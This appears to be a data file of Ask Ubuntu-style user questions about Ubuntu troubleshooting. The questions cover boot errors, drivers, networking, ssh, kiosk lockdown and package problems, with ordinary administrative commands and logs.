442030	is it possible to prevent user from open/save file dialog in ubuntu 12.04 lts	i 've a number of kiosk computer implemented my company 's application which use firefox as front end user interface . all the users have to do is just staying on firefox to do their job . however when they click on firefox 's `` file '' menu and click open or save page as , the file dialog show up so they can explore the file system including my back end application files and mapped network drive which i seriously want to hide for security reason . i 've found methods to hide those in nautilus using the .hidden file but it does n't work in file/save dialog . as i 'm very new to linux , i created user accounts for them as standard users and i think all user has read access to file system by default ( and should they need it to make operating system and application run properly ? ) then ca n't i take read permission out from them ? please correct me if i 'm wrong . so can i just prevent users from open file dialog ? an approach i can think now is that are there any file system or library file that handle those file/save dialog ? so that i can edit permission of them and the users will get permission denied dialog instead . for example , in the case below http : //ubuntuforums.org/showthread.php ? t=1363852 they remove the file : /usr/lib/gtk-2.0/2.10.0/printbackends/libprintbackend-file.so to disable `` print to file '' function . and another case https : //answers.launchpad.net/ubuntu/+source/nautilus/+question/186540 they edit permission of the folder : /usr/lib/gvfs/gvfsd-smb-browse to prevent users from clicking `` browse network '' button in nautilus . if not possible , any suggestion to hide file system and mapped network folder in file dialog ? please help every suggestion will be appreciated . thanks in advance .
442042	ubuntu 13.10 rdesktop issuse with local printer	i have a ubuntu 13.10 32-bit installed on my machine . i am using rdesktop to remote into a windows 7 pro 32-bit machine . i have a local printer that is connected via usb to my ubuntu machine . the local printer is a brother mfc-j430w . i want to share the printer to the windows 7 machine . here is the syntax that i have tried to use : rdesktop -r printer : mfcj430w= '' mfcj430w '' -f -x l -u mikej -d test win-7-32 after i enter the command , the remote desktop comes up fine , but i do n't have local printer in windows 7 . can some please tell me what i am doing wrong ?
442043	cant change size of wallpaper ( stock or from home/pictures ) 13.10 using gnome3	anyone got any idea why there are no options to adjust selected desktop wallpaper ( ie zoom / scale etc ) in ubuntu 13.10 and gnome3 ( works fine in unity but i really dont like using it ) . same issue for stock wallpaper and my own photos in /home/pictures : general system specs pentium e2160 @ 1.8ghz x 2 geforce 7300gs/pcie/sse2 64bit 2.0gb mem : dual monitor setup using 2 x acer lcd screens ( al1716 and al2202w ) latter is selected as main display system updates all done
442044	reinstalling windows while having linux ( ubuntu )	i have installed windows xp and then decided to install ubuntu . ubuntu is now set as default os ( it automatically loads ubuntu ) . my question is how can i reinstall windows xp without removing ubuntu ? windows xp is installed in separate partition . i am concerned that if i start reinstalling windows xp , ubuntu will be deleted .
442045	ubuntu 12.04 booting from a thumb drive - how to reasonably safely eject the drive after boot ?	i have a kubuntu 12.04 booting from a thumb drive , which works well , but i would like to be able to then pull out the thumb drive and hopefully not damage the file system so much that it will not boot . there are a few scenarios i have , but basically i need to be able to boot up from the thumb drive , start a couple programs ( or they may auto-start ) and then pull it . i already know the programs will continue to run / do not write any data , but i want to prevent the drive from becoming damaged and not able to boot ( or prevent the system from hanging ) when i remove the drive . possibly there is a way to boot with the drive in read only ( but allow me to put it in to read-write if i need to make changes ) ? any other ideas ?
442051	setting path in ubuntu 13.10	in ubuntu 13.10 i installed : stable_ubuntu-13.10-i686.deb and ubuntu-13.10-i686.deb , but when starting gnuradio the following message appears : can not import gnuradio . is the python path environment variable set correctly ? all os : pythonpath is the library path environment variable set correctly ? linux : ld_library_path windows : path macosx : dyld_library_path how can i set python path and the library path environment variable to the correct value ?
442055	test if operating from live session or not inside a shell script	i have a shell script that can only be run from a live session ( livecd or live usb ) because it shrinks the root filesystem of an actual installation , which can only be done when the filesystem is not mounted . if the script is run from the live session , it should pursue its execution . if not , it should fail . i can not find a way to differentiate the live session and a `` normal '' user session , as the live session has a look-and-feel very close to the installed system sessions . the only thing i can tell so far is that live sessions always have ubuntu as the hostname , but i can not rely on that since the user can choose this when installing ubuntu . is there a way of identifying this in a shell script / command line ? ( i hesitated between posting on ask ubuntu or stack overflow , i can delete the post and re-post on stack overflow if more appropriate )
442058	debian unstable equivalent in ubuntu	i want use ubuntu with the latest stable software instead of latest stable packages . as far as i 'm aware the debian equivalent is the debian unstable version . is the daily live images released by ubuntu equivalent ? does it continue updating with the latest stable software after a new stable ubuntu version is released ? as in , with the daily live installation of trusty , does it continue updating with development software after trusty goes golden ? i 'm not sure , but i think i read on mark shuttleworth 's blog that the development version of ubuntu is stable enough to use on desktops . i 'm neither trusting nor doubting the statement , but that post seemed to imply of continuous development releases like a rolling release . please enlighten me .
442061	surfraw configuration files missing	i recently installed surfraw on my ubuntu 12.04 lts surfraw documentation and web help suggests that these two configuration files should be present : /etc/surfraw.conf ~/.surfraw.conf but neither are present on my pc . i tried removing surfraw and then installing again but did n't help . does this mean surfraw is n't installing correctly ?
442062	how can i force the gnome clock in the top menu bar to update ?	i am running ubuntu 13.10 . when i use sudo ntpdate -s time.nist.gov to update my system time , i observe that the date command returns the correct time , but the gnome clock in the top menu bar on the right does not update and it seems to be frozen in time . how can i force it to update without logging out and logging back in ?
442064	ubuntu 13.10 empathy can not login two google accounts at the same time	i have two google accounts . ubuntu 13.10 configured to handle both accounts with empathy . when empathy starts , only one account is enabled . in empathy main dialog ( where the contacts are shown ) , there is an icon , showing that the not connected google account must be configured to be used . when that icon is clicked , the system online accounts dialog is shown , with both accounts connected and properly configured . after that , empathy just does n't show the contacts of the failed google account , neither the chat windows . anyone of both accounts can be in this state , seems to be random at empathy start . if the not connected account is reset in the online accounts dialog , it is automatically connected , but the before connected account is disconnected , and the same online accounts icon is shown in the empathy main dialog ( the same problem , but with the previously connected account ) . somebody knows whats happening ?
442066	gave up waiting for root device	i just installed ubuntu 12.04.4 but can not fully boot . here is my error message : gave up waiting for root device . common problems : - boot args ( cat /proc/cmdline ) - check rootdelay= ( did the system wait long enough ? ) - check root= ( did the system wait for the right device ? ) - missing modules ( cat /proc/modules ; ls /dev ) alert ! /dev/disk/by-uuid/8aba9bb9ba9ba06d does not exist . dropping to a shell ! busybox v1.18.5 ( ubuntu 1:1.18.5-1ubuntu4.1 ) built-in shell ( ash ) enter 'help ' for a list of built in commands.` ( initramfs ) _ i 'm a beginner and do n't have any idea what to do next . this is for a desktop pc with the following : windows vista home premium intel core 2 duo 6600 @ 2.4ghz 2 gb ram 32 bit os nvidia geforce 8800 gts video card hard drive : nvidia stripe 465.77 gb on nforce raid controller
442067	setting up swap space on a triple boot system ?	first off , os : ubuntu 13.10 , kali-linux , windows 7 ultimate h/w : asus laptop , i7 , 1tb hdd , 8gb ram since my hard drive already had 3 primary partitions i can not create a dedicated swap partition for ubuntu and kali-linux . i want to have 20gb of swap space for ubuntu and 20gb for kali-linux . my question is : is it possible and how should i go about it ? a link to a how to would be great ! i 'm trying to avoid system errors , and blue screens , and other bothersome issues . secondly , i use symantec ghost to build two hard drvies at a time ( an exact copy in case of a system crash ) . will it be able to see and copy ext4 partitions ( kali-linux and ubuntu13.10 ) onto a second hard drive ? will they be interchangeable ? it works for my windows 7 install but i was n't sure about ext4 and also my grub .
442069	how do i run multiple ubuntu versions on a single machine ?	is it possible to run two versions of ubuntu , i.e . 12.04 and 13.10 or 13.04 and 13.10 on the same 32-bit machine ? if it is possible than how can it be done ?
442071	python-software-properties unmet dependencies ubuntu 12.04	i just got a fresh ubuntu 12.04 server and i am trying to get add-apt-repository . for that i need the package python-software-properties . however , when i try to install it with apt-get , i actually get : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : python-software-properties : depends : unattended-upgrades but it is not installable depends : python-pycurl but it is not installable e : unable to correct problems , you have held broken packages . i really have no idea of how to fix it , and the only commands i ran before this were an update followed by an upgrade .
442072	how can i disable quick search in unity file explorer ?	when i 'm exploring files and folders , and type some character , i would like , instead of open a search , to jump over the file or folder containing the name of the pressed key . sorry about my poor english explanation.. thanks !
442075	time conflict in dual boot system	as per the suggestion by one of my friends , i tried to follow the process to edit /etc/default/rcs and then changed utc=no but after this i 'm not able to save this . can any tell the solution .
442076	ubuntu 12.04.4 x64 - how to disable ssh daemon	i 've read in this thread that running the ssh daemon with root privileges enabled by default is a potential path for malware infections : how to deal with malware on my laptop ? how can i check whether the ssh daemon is enabled , and if this is the case , how can i disable it permanently ? i think i do n't need it at all because my computer on which ubuntu is running is not used as a server .
442079	ap-hotspot works but nothing can connect	i have been searching forever regarding this issue , and i 'm not finding anyone with my unique circumstances . i 'm trying to set up a wifi hotspot using ubuntu . i was able to do this via windows 7 , however my laptop does n't have win7 , so i 'm trying to create the same setup on my laptop . the adapter i am using is an alfa awus036nhr v.2 . as far as i can tell the drivers are pre-installed in ubuntu , as it is able to connect to networks . i set up the ap-hotspot per various instructions around the web . i am using the command sudo ap-hotspot config sudo ap-hotspot start all of my devices can see the network , however the android gets an authentication error , the iphone keeps getting `` wrong passcode '' and the raspberry pi is going in a `` 4 way handshake ( station ) '' disconnect/reconnect loop . when i went through this excercise on windows 7 , i had to manually force the adapter to use different drivers until i found one that worked as a hotspot . i 'm concerned this may be the issue here as well , however i ca n't even get my system to install the drivers from the alfa.com.tw website . i am using a fresh ubuntu 12.04 install on an hp elitebook 8530 laptop . below is the output of ap-hotspot debug sudo ap-hotspot debug starting wireless hotspot ... * stopping dns forwarder and dhcp server dnsmasq * ( not running ) update-rc.d : warning : hostapd start runlevel arguments ( none ) do not match lsb default-start values ( 2 3 4 5 ) update-rc.d : warning : hostapd stop runlevel arguments ( none ) do not match lsb default-stop values ( 0 1 6 ) disabling system startup links for /etc/init.d/hostapd ... removing any system startup links for /etc/init.d/hostapd ... /etc/rc0.d/k20hostapd /etc/rc1.d/k20hostapd /etc/rc2.d/k80hostapd /etc/rc3.d/k80hostapd /etc/rc4.d/k80hostapd /etc/rc5.d/k80hostapd /etc/rc6.d/k20hostapd adding system startup for /etc/init.d/hostapd ... /etc/rc0.d/k20hostapd - > ../init.d/hostapd /etc/rc1.d/k20hostapd - > ../init.d/hostapd /etc/rc6.d/k20hostapd - > ../init.d/hostapd /etc/rc2.d/k80hostapd - > ../init.d/hostapd /etc/rc3.d/k80hostapd - > ../init.d/hostapd /etc/rc4.d/k80hostapd - > ../init.d/hostapd /etc/rc5.d/k80hostapd - > ../init.d/hostapd update-rc.d : warning : dnsmasq start runlevel arguments ( none ) do not match lsb default-start values ( 2 3 4 5 ) update-rc.d : warning : dnsmasq stop runlevel arguments ( none ) do not match lsb default-stop values ( 0 1 6 ) disabling system startup links for /etc/init.d/dnsmasq ... removing any system startup links for /etc/init.d/dnsmasq ... /etc/rc0.d/k85dnsmasq /etc/rc1.d/k85dnsmasq /etc/rc2.d/k85dnsmasq /etc/rc3.d/k85dnsmasq /etc/rc4.d/k85dnsmasq /etc/rc5.d/k85dnsmasq /etc/rc6.d/k85dnsmasq adding system startup for /etc/init.d/dnsmasq ... /etc/rc0.d/k85dnsmasq - > ../init.d/dnsmasq /etc/rc1.d/k85dnsmasq - > ../init.d/dnsmasq /etc/rc6.d/k85dnsmasq - > ../init.d/dnsmasq /etc/rc2.d/k85dnsmasq - > ../init.d/dnsmasq /etc/rc3.d/k85dnsmasq - > ../init.d/dnsmasq /etc/rc4.d/k85dnsmasq - > ../init.d/dnsmasq /etc/rc5.d/k85dnsmasq - > ../init.d/dnsmasq * restarting dns forwarder and dhcp server configuration syntax check ... fail ! net.ipv4.ip_forward = 1 wireless hotspot active i 'm fairly new at this so i 'm not sure what is wrong , but it appears to be very many things . please let me know if there 's any further information needed .
442090	wake on lan remotely	how can i get wake on lan to work outside of my home network . i can activate it from inside the network but not from outside .
442091	whatsapp on ubuntu mobile	do you know if there is some whatsapp client on ubuntu for mobile phones ? i would want to use it . thanks in advance .
442095	application layer connection when using apt-get install	i know by type sudo apt-get install myprogram , i can download and install myprogram from repositories . by calling this command in terminal which kind of application layer connection will be established ? i guess in transport layer it will make a tcp connection but i am not sure .
442096	install 12.04 from usb on xp without touching any software	if i have a download of 12.04 on a usb drive can i install into a notebook with enough resources and leave the data and software intact which i want to keep ?
442100	my laptop 's touchpad is not working when i login to ubuntu 12.04	ca n't login to ubuntu 12.04 from my hp lap . touchpad is not working when login , so i can not enter password ... . when i login from 'ubuntu recovery mode ' it goes to terminal only
442101	how to automatically set terminal title to directory name without path	currently , my bash terminal/tab title is set based on the directory i 'm in . for example : bob @ bobscomputer : ~/i/had/some/great/pie/yesterday this is n't very useful if i have multiple tabs open side-by-side . for example , if i have 4 tabs of the above dir open side-by-side , all i see is bob @ bobscomputer : ~/i/had ... 4 times . i 'd like all my terminal titles to be set automatically to just the last part of the path . in the example above , i 'd like the title to be yesterday obviously , the title should change when i change directories . i 'd like to do this without changing my prompt , so the prompt and the terminal title should be different . is there a way to do this ?
442103	encrypted home folder is still accessible with another distro	i partitioned an hdd in to four , the biggest of them being the home directory . this drive was encrypted during xubuntu installation and worked perfectly fine . i then booted from another ubuntu live cd and checked this drive manually and found them to be encrypted as expected . but now that i have replaced xubuntu with ubuntu , with the same root password and name , the encrypted drive is visible again ! does n't this imply that the encryption key is replaced ( or diminished in value ) by my mere 6-character password ?
442104	12.04 desktop is frozen . how to unfreeze the desktop ?	i have 12.04 on a duel boot partition with windows 7 , my desktop on 12.04 is frozen , i would like to upgrade but all i have access to is the command line . how do i fix or unfreeze the desktop ?
442108	internel server error when installing savanna	i have installed openstack following the tutorial from here . it worked fine and i was able to login to dashboard . but when i tried to install savanna by following this , i start getting this error when i login to dashboard . any solution ?
442110	eclipse theme is stuck as a basic flat theme	i opened eclipse up on my vm which has ubuntu 12.04 lts installed . it looks like this i have no idea how to revert it back to the nicer looking version
442112	presentation background not showing correctly	this presentation has an almost transparent background , i downloaded it and opened it in the latest version of libreoffice and the transparency is gone . do you know why this is happening and how to make libreoffice open this presentation correctly ? i tried it on my brother 's windows 7 laptop , and the presentation is showing correctly in powerpoint so the issue is with libreoffice edit maybe it 's unrelated to libreoffice cause im having the same problem with kingsoft office , so how does linux render documents ? ! why is it different than windows ?
442113	shellinabox with apache	i want to run shellinabox on the same port 80 ( /443 ) as my apache server . i was following this tutorial . but i ca n't get it to work ... when i go to http : //ip/shell it does n't work . but when i go directly to shellinabox on the default port , it works ( http : //ip:4200 ) , so i think that the problem is somewhere in my apache config file . ( i 'm not sure if this is relevant but i 'm also running a sql server with phpmyadmin and bandwidthd ) . or is there a other way to accomplish this ?
442121	5.25 '' 360k floppy disk support	i 'm building a legacy machine , and want to be able to read/write/format 5.25 '' 360k floppy disks . i have 360k drive , and motherboard that supports it . does ubuntu support this type of drive ? and can i drag and drop files to/from the disk , and format in the gui ? thanks
442122	trouble with video card drivers on new laptop	i 've just purchased a new laptop and started by installing xubuntu onto it . i ca n't seem to get any controls to work for my video card . being fairly new to linux , i 'm not sure what steps to take to debug this , nor what steps to take to repair it . here are some of the problems i 'm having : backlight keys nonfunctioning cant change backlight with xbacklight 'no outputs have backlight property ' in display in settings , i ca n't change resolution , or anything else in display in settings , i only have default listed nvidia_current is installed and sudo lshw -c display shows the following output : *-display description : 3d controller product : gk106m [ geforce gtx 765m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:16 memory : f6000000-f6ffffff memory : e0000000-efffffff memory : f0000000-f1ffffff ioport : e000 ( size=128 ) memory : f7000000-f707ffff *-display unclaimed description : vga compatible controller product : 4th gen core processor integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 06 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller cap_list configuration : latency=0 resources : memory : f7400000-f77fffff memory : d0000000-dfffffff ioport : f000 ( size=64 ) i 'm desperate for help as at the moment , i 'm finding my screen far to bright to work on , and i 'm starting to lose the will to live . update i 've just discovered that xorg appears to be disabling my nvidia drivers : ubuntu-drivers debug debug : root : x.org log reports loaded intel driver , disabling driver nvidia-173 for hybrid system debug : root : x.org log reports loaded intel driver , disabling driver nvidia-304 for hybrid system debug : root : x.org log reports loaded intel driver , disabling driver nvidia-304-updates for hybrid system debug : root : x.org log reports loaded intel driver , disabling driver nvidia-319 for hybrid system debug : root : x.org log reports loaded intel driver , disabling driver nvidia-319-updates for hybrid system how do i solve this issue ?
442123	can i buy a ubunto os disc ?	i need an os that i can install on older xp os computers . i do not understand computer slang , brain is too aged . i do print instructions that use words identical to what is found in the os . so i need to buy a plug & play option with simple settings . i am limited to dialup , long downloads fail because of telemarketer intrusions . the os needs to be proven & current & available in ontario canada . can someone help this senior get out of the failing xp ?
442131	xgterm ca n't locate installed library	i 'm installing iraf on a new machine , and when i try to launch xgterm , i get the error message : xgterm : error while loading shared libraries : libxmu.so.6 : can not open shared object file : no such file or directory however , the package that contains this library , libxmu6 , is both installed and up to date . any help would be appreciated .
442132	upgrading libcurl on ubuntu 12.04	i 'm seeing recurring stacktraces as shown below , which i think is caused by 12.04 shipping with an old curl ( as mentioned here ) . how could i upgrade to a more recent stable version ? /lib/x86_64-linux-gnu/libc.so.6 ( __fortify_fail+0x37 ) [ 0x7fd094253f47 ] /lib/x86_64-linux-gnu/libc.so.6 ( +0x10aebd ) [ 0x7fd094253ebd ] /lib/x86_64-linux-gnu/libc.so.6 ( __longjmp_chk+0x33 ) [ 0x7fd094253e23 ] /usr/lib/x86_64-linux-gnu/libcurl.so.4 ( +0xdff5 ) [ 0x7fd08ce6eff5 ] /lib/x86_64-linux-gnu/libc.so.6 ( +0x364a0 ) [ 0x7fd09417f4a0 ] /lib/x86_64-linux-gnu/libc.so.6 ( __select+0x33 ) [ 0x7fd094236763 ] /usr/lib/x86_64-linux-gnu/libruby-2.1.so.2.1 ( rb_thread_fd_select+0x151 ) [ 0x7fd09469a061 ] here 's the curl -- version : curl 7.22.0 ( x86_64-pc-linux-gnu ) libcurl/7.22.0 openssl/1.0.1 zlib/1.2.3.4 libidn/1 .23 librtmp/2.3 protocols : dict file ftp ftps gopher http https imap imaps ldap pop3 pop3s rtmp rtsp smtp smtps telnet tftp features : gss-negotiate idn ipv6 largefile ntlm ntlm_wb ssl libz tls-srp blockquote
442133	steam does not start after install in 13.10	i have installed steam on my laptop running 13.10 , when i click on steam icon , it wont launch , so i have given `` steam '' command in terminal.following is the output running steam on ubuntu 13.10 64-bit steam_runtime is enabled automatically installing breakpad exception handler for appid ( steam ) /version ( 0_client ) uploading dump ( out-of-process ) [ proxy '' ] /tmp/dumps/crash_20140402034337_1.dmp /home/saikiran/.local/share/steam/steam.sh : line 755 : 6814 segmentation fault ( core dumped ) $ steam_debugger `` $ steamroot/ $ platform/ $ steamexe '' `` $ @ '' mv : can not stat ‘/home/saikiran/.steam/registry.vdf’ : no such file or directory installing bootstrap /home/saikiran/.local/share/steam/bootstrap.tar.xz reset complete ! restarting steam by request ... finished uploading minidump ( out-of-process ) : success = yes response : crashid=bp-1e1a9170-2ae6-46c1-bc74-3c0db2140401 running steam on ubuntu 13.10 64-bit steam_runtime has been set by the user to : /home/saikiran/.local/share/steam/ubuntu12_32/steam-runtime installing breakpad exception handler for appid ( steam ) /version ( 0_client ) uploading dump ( out-of-process ) [ proxy '' ] /tmp/dumps/crash_20140402034339_1.dmp /home/saikiran/.local/share/steam/steam.sh : line 755 : 6943 segmentation fault ( core dumped ) $ steam_debugger `` $ steamroot/ $ platform/ $ steamexe '' `` $ @ '' finished uploading minidump ( out-of-process ) : success = yes response : crashid=bp-06b25061-5bb4-42c2-b835-bc2e92140401 i have tried removing ~/.steam/steam/appcache as indicated in other threads i have installed steam on xubuntu 14.04 beta , still same thing happens .
442136	how can i get a file before logging to any os ?	this is my problem : `` no such device '' . i have been trying and searching all day with no success . i have the ubuntu.iso file somewhere on my internal hard disk . is there any way i can get it and copy the file to a usb flash memory , so that i can re-create the live ubuntu usb driver and install it from the beginning ? currently i 'm stuck at : > error : no such device : 70b94286 ... ... > entering rescue mode ... > grub rescue >
442138	ubuntu hp chromebook 14 graphics tablet	i want to get a hp chromebook 14 and install ubuntu on it . that part is easy , as i have done similar tasks before . the question is , will a graphics tablet work with ubuntu and hp chromebook 14 . i want to get this laptop for school , but i have taken an animation course so i would need a graphics tablet .
442139	help with zfs pools	running ubuntu 12.10 using zfs on linux i just replaced a drive in the zpool and everything looked like it was working then i rebooted and now it says that the drive that i just replaced is unavail , but i can bring it back up by doing a zpool offline/zpool online but if i reboot again it shows unavail again ? anyone have any ideas ? pool : stuff state : degraded status : one or more devices could not be used because the label is missing or invalid . sufficient replicas exist for the pool to continue functioning in a degraded state . action : replace the device using 'zpool replace ' . see : http : //zfsonlinux.org/msg/zfs-8000-4j scan : resilvered 5.13m in 0h0m with 0 errors on tue apr 1 15:43:28 2014 config : name state read write cksum stuff degraded 0 0 0 raidz2-0 degraded 0 0 0 green-wmc1t0276669-3.25-bay2 online 0 0 0 red-wcc4n0226706 online 0 0 0 red-wmc4n0938245 online 0 0 0 red-wmc4n1316638-3.25-bay3 unavail 0 0 0 red-wmc4n1926143-3.25-bay6 online 0 0 0 red-wmc4n2264263-5.25-bay1 online 0 0 0
442140	forward http requests to local apache server behind router ?	i have an apache server running on ubuntu , and by default it is using name-based virtual hosts . for some reason i have to make my local server publicly accessible , but the problem is that i am running internet with wlan router , and my wlan router allows ip forwarding only to local ip addresses ( not name-based hosts ) , so i ca n't forward http request to my external ip address to e.g . localhost , but i can forward to , say , 192.168.x.x . so my question is , can i make my apache server run on some 192.168.x.x address to make it possible for router to forward http requests to my local server . sorry for my amateur naive language , i am quite new to networking and stuff . thanks in advance ! edit ip route output : default via 192.168.0.1 dev wlan0 proto static 192.168.0.0/24 dev wlan0 proto kernel scope link src 192.168.0.101 metric 9
442142	is it safe to use kernel 3.8 with ubuntu 13.10 ?	kernel 3.8 is my last bug-free kernel , kernels from 3.9 to 3.12 all have a suspend/resume problem , kernel 3.13 seems to fix the bug but the cpu fan does n't work any more ( stays at low speed even if the cpu is about to melt down from heat ) . i know that ubuntu saucy ships with kernel 3.10 and this is what worries me , so will it cause problems if i use kernel 3.8 ?
442144	when did ubuntu get created ?	what year did ubuntu come out to the public ? who created it ? why was it created ? how popular is it today ? what are the other types of linux os ? name them please . thanks .
442146	ubuntu 13.10 - target filesystem does n't have /sbin/init	after installing an update i restarted my computer . ubuntu failed to boot , so i used boot-repair to try to fix it . after running boot-repair grub2 was removed and the ubuntu os was no longer detected by the live cd . i reinstalled grub2 which worked , but i got the error : mount : mounting on /dev on root/dev failed : no such file or directory mount : mounting on /sys on root/sys failed : no such file or directory mount : mounting on /proc on root/proc failed : no such file or directory target filesystem does n't have requested /sbin/init . no init found . try passing init= bootarg after this , it brings me to busy box . i found solutions for the error . fsck and e2fsck do n't work . boot summary here : http : //pastebin.com/5cecmqjx ubuntu is installed in sda1 . any help ?
442148	alternative to dd for back/restore of mbr	i need a program that can backup/restore an mbr so that if i have boot problems related to such i can just restore it . i 'm aware that dd can be used for this , but i 'm looking for an alternative tool , and if possible something from the default repos .
442151	how to create a user that can login via ssh , but ca n't use shell commands ?	how to create a new user that can login via ssh , but ca n't use shell commands ? i 've tried to set /bin/false as the default shell to the user , but then i no longer can login via ssh .
442152	intuous wacom pen & touch cth-480	ok i have looked up a plethora of these questions on how to install them , and honestly i ca n't get it to work for the life of me . i do n't know what i 'm doing wrong , nor am i super experienced with linux . when i read some of these instructions and they are even the slightest vauge , such as with not explaining from start to finish how to `` cd '' something , i tend to get rather lost . so my question is , can someone just lay out for me in the most simple way on how to install my intuos wacom pen and touch cth-480 / cth-480/s ? and i mean every single step , i have tried and tried and simply can not get it done . i was hoping to ditch my shite of a track pad that comes with this throwaway laptop but no such luck .
442153	how to get apt after i accidentally uninstalled it	is it possible to use dpkg to install apt ? it was uninstalled accidentally . if not , how can i get apt without reinstalling ubuntu ? edit : the following is what i get when i try to install apt with dpkg ... root @ ben-hp-envy-dv4-notebook-pc : /home/ben/downloads # sudo dpkg -i apt.deb ( reading database ... 285851 files and directories currently installed . ) preparing to replace apt 0.9.7.9+deb7u1 ( using apt.deb ) ... unpacking replacement apt ... setting up apt ( 0.9.7.9+deb7u1 ) ... gpg : key b98321f9 : `` squeeze stable release key < debian-release @ lists.debian.org > '' not changed gpg : key 473041fa : `` debian archive automatic signing key ( 6.0/squeeze ) < ftpmaster @ debian.org > '' not changed gpg : key 65ffb764 : `` wheezy stable release key < debian-release @ lists.debian.org > '' not changed gpg : key 46925553 : `` debian archive automatic signing key ( 7.0/wheezy ) < ftpmaster @ debian.org > '' not changed gpg : total number processed : 4 gpg : unchanged : 4 processing triggers for man-db ...
442158	dns look up failed - ubuntu 12.04	i have this problem , which seems to be a 'common ' problem on ubuntu . when i try to open some pages on chromium i get the `` dns look up failed '' error . ( it does n't say exactly that on firefox but it 's the same problem ) . the thing is i 've tried every of the answers i 've found on that issue and none of the have gotten permanently rid of the problem . i 've renamed the resolv.conf file : cd /etc sudo mv resolv.conf backup.resolv.conf no luck . i 've also commented out the dnsmasq from the networkmanager.conf file with sudo nano /etc/networkmanager/networkmanager.conf by putting a `` # '' . it ended up : [ main ] plugins=ifupdown , keyfile # dns=dnsmasq [ ifupdown ] managed=false then i restarted the network-manager service sudo restart network-manager it worked once really nice . but next time i turned on the computer it was just the same and from there on there was nothing i could do . it 's so incredibly infuriating . i 'm in love with ubuntu , but that one problem is such a deal-breaker . i could n't even ask this question from ubuntu . i need some help , please . edit : output from nm-tool : networkmanager tool state : connected ( global ) device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : sky2 state : unavailable default : no hw address : 00:23 : ae:35:96:8d capabilities : carrier detect : yes wired properties carrier : off device : eth1 [ grojas home ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : wl state : connected default : yes hw address : 70:1a:04:71:03 : d0 capabilities : speed : 54 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) flia . castillo : infra , 88:53 : d4 : d8 : c9:70 , freq 2412 mhz , rate 54 mb/s , strength 32 > wpa wpa2 claro334 : infra , ec:43 : f6 : bb:2f : fc , freq 2437 mhz , rate 54 mb/s , strength 22 > wpa2 *grojas home : infra , 00:25:86 : b1:7d:62 , freq 2437 mhz , rate 54 mb/s , strength 92 > wpa ipv4 settings : address : 192.168.1.100 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.1.1 dns : 192.168.100.1 dns : 192.168.1.1
442160	how can i install ubuntu alongside windows 7 ?	how can i install ubuntu alongside windows 7 , because the option to install ubuntu alongside windows 7 does not show me ? i want to install the hard disk partitioning manually . how can i do it ?
442166	execute script automaticaly when removable media mounted	i would like to execute some script automatically when removable media ( e.g . usb flash memory ) mounted . it likes autoexec.bat on microsoft windows . how can i realize it ? in existing question ( and answer ) , how to run a script when a specific flash-drive is mounted ? , it 's solution is edit rules.d on local storage . however , i do n't want to edit it . because my purpose is build installer or log data capture for a lot of target . on windows , when removable media ( autoexec.bat included ) mounted , autoexec.bat start quickly without any settings for system . i would like to do the same things it .
442168	has canonical really sold to facebook ?	as stated above , has canonical really sold to facebook ?
442169	lost the ability to tether my iphone to my laptop	i recently upgraded the operating system on my iphone 4s . when i did i lost the ability to tether my phone to my laptop . my laptop is an old lenovo t61 that i keep in my car . it 's a really rouged machine so i do n't want to replace it . when i try a tethered connection my laptop tells me the phone is locked and advises me to enter my passcode on the phone and try again . at the same time the phone asks me if i trust the computer . if i say yes to the phone , the computer gets stuck in a loop that causes it to try to access the internet until it times out and then it tries again . i also use this same connection with my desktop and the desktop works well . does anyone have some idea as to what can be done ?
442170	i ca n't run steam and i think my nvidia driver is the problem	i have read many , many posts and guides about how to do this , and i am just getting frustrated . i 've reinstalled the xubuntu 12.04 half a dozen times . what i would like to do is play games with steam . i am able to get xubuntu to boot , but i ca n't get into steam . it gives me a variety of errors based on the nvidia driver i install . when i use nvidia-331 , my system boots to tty1 and i have to purge nvidia and start over . the other nvidia drivers give me errors on loading steam like `` opengl glx extension not supported by display . '' i was able to play my entire library on windows xp , but now i want to give linux a try since xp is no longer supported . edit : i am running a laptop with an nvidia 8600m gt .
442173	how to mount removable storage with custom options ?	how can i change mount options for removable devices mounted by kde 's device manager ?
442174	what cd burn lib for app development libburn	hi i am developing a gtk front end for playing audio files , encoding them then burning audio cd 's . i have playing and encoding implemented but have run into a wall with burning . i would rather not call wodim or the likes in a spawned system ( ) call . but after days of research have yet to come up with a suitable cd burning lib . most libs seem to be dead or unmaintained forks and those not dead seem close to dead when checking there current activity levels . libburn seems to be the most promising but the documentation etc also seems out of date with much talk of 2.6 kernel use . any pointers in the right direction would be much appreciated . thanks in adavnce milo
442175	can you use ssh for internet remotely ?	i am getting very interested in ssh . i believe i have configured the /etc/ssh/sshd_config file properly . what i want to be able to do is use the internet through ssh , and print to my wireless printer . i found this youtube video on how to use putty to connect to the internet remotely : https : //www.youtube.com/watch ? v=uaqqho5yr88 . however , i continue to get this error message when i go to the tunnel button in putty . is there something that i could be doing differently ? i put the ip address of the computer i want to connect to , and i have added a port but no luck so far . again , thank you all for your help in advance .
442176	2nd hard drive error mounting volume	please help ! i took out the slave sata hdd from ubuntu system that is running and accessing the drive no problem . then i put the drive into window 7 system as slave , it asked for reformat it so i canceled since i am afraid of losing data . i think i am stupid at thinking that window 7 system can access the data in it . then i put it back to the ubuntu system , i can not mount the volume on this drive . i got error shows : `` an error occurred while performing an operation on `` disk_2 '' ( partion 1 of ata hitachi hds747474774c ) : filesystem driver not installed please help , many thanks ...
